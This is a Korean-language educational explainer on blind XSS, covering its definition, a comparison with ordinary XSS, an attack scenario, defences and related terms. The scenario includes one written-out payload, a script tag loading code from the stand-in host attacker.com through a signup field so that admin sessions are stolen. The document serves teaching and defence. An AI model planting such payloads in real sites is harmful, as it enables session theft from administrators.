Blind Cross-Site Scripting

**📌 블라인드 XSS (Blind Cross-Site Scripting)**는 일반적인 XSS(Cross-Site Scripting, 교차 사이트 스크립팅)의 일종으로, 악성 스크립트가 삽입된 즉시 실행되는 것이 아니라, 피해자가 해당 스크립트가 저장된 위치에 접근할 때 나중에 실행되는 XSS 공격입니다.

---

✅ 1. 개념 정리

항목	설명
정의	공격자가 삽입한 스크립트가 즉시 실행되지 않고, 관리자나 다른 사용자가 접근했을 때 실행되는 XSS
특징	공격자가 피해자의 실행 결과를 직접 볼 수 없음 → 별도 수신 서버(log server)로 결과 전송 필요
이름의 유래	공격자는 "눈에 보이지 않는(Blind)" 상태에서 결과를 확인해야 하므로 "블라인드 XSS"라 부름

---

✅ 2. 일반 XSS vs 블라인드 XSS

구분	일반 XSS	블라인드 XSS
실행 시점	공격 코드 삽입과 동시에 실행	나중에 (예: 관리자가 접근 시) 실행
공격 확인	삽입 후 바로 확인 가능	직접 확인 불가, 외부 서버 로그로 확인
예시 대상	게시판 댓글, 검색창	관리자 페이지, 로그 뷰어, 이메일 리더 등
대응 난이도	상대적으로 낮음	탐지·방어 어려움, 사후 대응 필요

---

✅ 3. 공격 시나리오 예

1. 사용자가 회원가입 폼의 "이름" 필드에 다음과 같은 악성 스크립트를 삽입:

<script src="https://attacker.com/log.js"></script>

2. 웹사이트는 사용자 입력을 검증 없이 데이터베이스에 저장함
3. 시간이 지난 후, 관리자가 관리자 페이지에서 해당 사용자 정보를 조회
4. 그 시점에 악성 스크립트가 관리자 브라우저에서 실행 → 세션 탈취, 키로깅, CSRF 등 수행
5. 관리자 세션이나 정보가 공격자의 서버(attacker.com)로 전송됨

---

✅ 4. 대응 방법

🔐 입력단/출력단 보안

• 입력 검증(Input Validation): HTML 태그, 스크립트 등 위험 요소 제거
• 출력 인코딩(Output Encoding): HTML escape 처리 (< → < 등)
• Content Security Policy(CSP): 외부 스크립트 실행 제한

🧪 테스트 및 탐지

• 보안 테스트 도구 사용: Burp Suite, XSS Hunter, XSStrike 등
• 블라인드 XSS 테스트 플랫폼 활용: xsshunter.com 등

🔍 로그 감시

• 관리 페이지, 백오피스 로그 뷰어 등에 저장된 사용자 입력 필드에 대한 렌더링 전 필터링 적용

---

✅ 5. 관련 용어

용어	설명
Stored XSS	악성 스크립트가 서버에 저장되어 다수 사용자에게 노출
Reflected XSS	URL 또는 요청 파라미터에 포함되어 즉시 응답에 반영
DOM-based XSS	브라우저 내 자바스크립트 동작에 의해 XSS 발생
Blind XSS	공격 후 피해자가 특정 페이지에 접근했을 때 발생 (공격자가 직접 확인 못함)

---

✅ 요약 한 줄 정의

블라인드 XSS는 스크립트가 즉시 실행되지 않고, 특정 사용자가 페이지에 접근할 때 나중에 실행되는 은밀한 XSS 공격 방식입니다.

---